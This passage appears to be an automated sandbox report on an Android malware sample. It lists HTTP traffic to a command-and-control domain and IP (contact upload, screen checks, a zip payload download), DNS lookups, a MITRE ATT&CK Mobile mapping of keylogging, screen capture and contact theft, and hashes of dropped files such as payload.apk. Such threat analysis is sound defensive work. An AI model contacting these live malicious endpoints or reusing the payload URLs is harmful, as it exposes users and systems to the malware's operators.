    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/contacts

    HTTP Response

    200

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log

    HTTP Response

    403
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    http
    4.6kB
     109.6kB
     75
    82

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip

    HTTP Response

    206
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    http
    777 B
     478 B
     6
    4

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log

    HTTP Response

    403
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    http
    76.7kB
     6.1MB
     1394
    3555

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/storage/zip/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip

    HTTP Response

    206
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    http
    777 B
     478 B
     6
    4

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log

    HTTP Response

    403
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    http
    1.7kB
     21.9kB
     18
    21

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log

    HTTP Response

    403
  • 62.60.226.33:80
    http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log
    http
    2.5kB
     22.0kB
     24
    23

    HTTP Request

    GET http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/check?screen=true

    HTTP Response

    200

    HTTP Request

    POST http://1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org/api/v1/device/server-log

    HTTP Response

    403
  • 142.250.187.193:443
    tls
    187 B
     40 B
     3
    1
  • 142.250.187.225:443
    tls
    519 B
     7
  • 216.239.32.223:443
    tls, https
    128 B
     40 B
     2
    1
  • 224.0.0.251:5353
    3.8kB
     12
  • 1.1.1.1:53
    www.youtube.com
    dns
    122 B
     303 B
     2
    1

    DNS Request

    www.youtube.com

    DNS Request

    www.youtube.com

    DNS Response

    142.250.200.14
    216.58.212.206
    142.250.180.14
    142.250.200.46
    216.58.213.14
    216.58.201.110
    142.250.187.238
    142.250.187.206
    172.217.16.238
    172.217.169.78
    216.58.204.78
    142.250.179.238
    142.250.178.14

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
     109 B
     1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    142.250.187.238

  • 1.1.1.1:53
    1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org
    dns
    99 B
     115 B
     1
    1

    DNS Request

    1231254123-123d34123-xzccv-1sasdqwe-123cvbe-dqwed.org

    DNS Response

    62.60.226.33

  • 1.1.1.1:53
    ssl.google-analytics.com
    dns
    140 B
     86 B
     2
    1

    DNS Request

    ssl.google-analytics.com

    DNS Request

    ssl.google-analytics.com

    DNS Response

    216.58.213.8

  • 1.1.1.1:53
    ip-api.com
    dns
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

MITRE ATT&CK Mobile v15

Initial Access

Execution

Persistence

Foreground Persistence

1
T1541

Privilege Escalation

Defense Evasion

Download New Code at Runtime

1
T1407

Foreground Persistence

1
T1541

Impair Defenses

1
T1629

Prevent Application Removal

1
T1629.001

Indicator Removal on Host

1
T1630

Uninstall Malicious Application

1
T1630.001

Input Injection

1
T1516

Credential Access

Input Capture

2
T1417

GUI Input Capture

1
T1417.002

Keylogging

1
T1417.001

Discovery

Software Discovery

1
T1418

Security Software Discovery

1
T1418.001

System Network Configuration Discovery

2
T1422

System Network Connections Discovery

1
T1421

Lateral Movement

Collection

Input Capture

2
T1417

GUI Input Capture

1
T1417.002

Keylogging

1
T1417.001

Protected User Data

1
T1636

Contact List

1
T1636.003

Screen Capture

1
T1513

Command and Control

Exfiltration

Impact

Input Injection

1
T1516

Replay Monitor

Loading Replay Monitor...

Downloads

  • /data/user/0/com.dfzmabwby.wbpjhioxj/app_apk/payload.apk
    Filesize

    974KB

    MD5

    3baeaa766ea7f31a9147208efd957c75

    SHA1

    c701de3d0e55425394ccbf8e0967639e86f3c54e

    SHA256

    75e162dc291e15d13b0f3202a66e0c88ff2db09ec02922ee64818dbddcb78d6d

    SHA512

    9f3ccb1fc9a177524ba2d39f809be4851af385073463893bd4a8664308253fc0da2b9ab330c85675dbe9ce0c44b631a0d1ec7800491687c7b2540504b351295f

    Download Submit

  • /data/user/0/com.dfzmabwby.wbpjhioxj/app_dex/classes.dex
    Filesize

    2.2MB

    MD5

    60af84a82afae12ff7052f9ed9cce45b

    SHA1

    1be6ba4a975b25e3ebef93be009d6536c67541d1

    SHA256

    1491cc9fd0391b238fbaacc492791dbb45be3f78536c008f55f8dd40fa80bccf

    SHA512

    042a86513b26c08ed60d7395bcc65f6c2eda778951c5b6d20916704613b5fc414ccfd327f5583f15e67526b73636e8b6ccfa3e1ffe573577c1637f0ff719ca06

    Download Submit

  • /data/user/0/com.dfzmabwby.wbpjhioxj/cache/classes.dex
    Filesize

    972KB

    MD5

    c5a37df3cf85474050e8306c056b9cf7

    SHA1

    fdc72e443f1ecbd63890c8cc532dbcd7421196c8

    SHA256

    ae0c7db4a2be86772c697bd9859c50965e8dd14c478db1691e7ba4c9d7c83976

    SHA512

    073e97fe065b956f84f8cf9ad054052b41238a802f97fcc66ee5f0eae3ce3c9115d0ac33c4e5ee98f4d8ae88d29955e90c55c4903e7838f7a636b4153fecd865

    Download Submit

  • /data/user/0/com.dfzmabwby.wbpjhioxj/cache/classes.zip
    Filesize

    973KB

    MD5

    f5f722a77c3b6a8d6d08f2cd27bf4fd6

    SHA1

    2bd365abf3d3066ba40a3019084fe864a9cd21d8

    SHA256

    30977adf0b70feea783ef1e4b791a99647ab5628f8fdc841813ac8e441bbf5e9

    SHA512

    019b20daf5c5279f06d2a26345355827a1de4617277e719583e8367a0bfed925b35c51ddb7c0e4e9b1d1495956ad317f0af82c8b6473acccc6df219d3e12873b

    Download Submit

  • /data/user/0/com.dfzmabwby.wbpjhioxj/cache/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    Filesize

    1.7MB

    MD5

    ac4f110b696709f3bd0202a01a21d0ea

    SHA1

    ae6b3b8329cb41f550c9da0012d10770c026b8a1

    SHA256

    59a18522b5e99d722c2bceae6138e38f97e7fa604c6265a5a674c706cc0c2994

    SHA512

    dd589122c16f152dfb8d7d85536452687343548d5860f87abec9159a129c41218e62ba4fdbac94ffa4c35fca6f26411e424a9c793a61d518787b717ac2d59810

    Download Submit

  • /data/user/0/com.dfzmabwby.wbpjhioxj/cache/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    Filesize

    77KB

    MD5

    4370f4b4a7d14cc48096f3be668cbf08

    SHA1

    2e8454ff6ba99db3b4e99d68ebccff202114f72a

    SHA256

    a94c527e99ab085534a834206aa11fa015db24c960d48d7323aa7fa37fc5c9fd

    SHA512

    ecd86a1c8b101632a287eba7047f82308a30d6fdbd16629f542bf9447c71853cd70e30410583eadb10cd6d3bfc78de8c5fa1ff9c13c3a239af34b2b7e634c6ae

    Download Submit

  • /data/user/0/com.dfzmabwby.wbpjhioxj/cache/x41bisfTMKrsQCxvJgn9Dm64yPIElwD8H8NZGzsu.zip
    Filesize

    5.6MB

    MD5

    bb22abfc91a948df02e9884cb1de0cff

    SHA1

    2b1396d627a95fab52ad23a1bfc1dab6451e6008

    SHA256

    7ecce06f5ea0391b0387c70f2ee739d6921ee1804d09763ed92952485f6dfcaf

    SHA512

    1d48e86a0d5499ebdb85b0f8bd1b5d856fc083d83394cae9e58ce399210c5f4eca713e33ad83bf53e48223af1fad7f89afa94bd08ec37a7560fca46bbce93667

    Download Submit

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.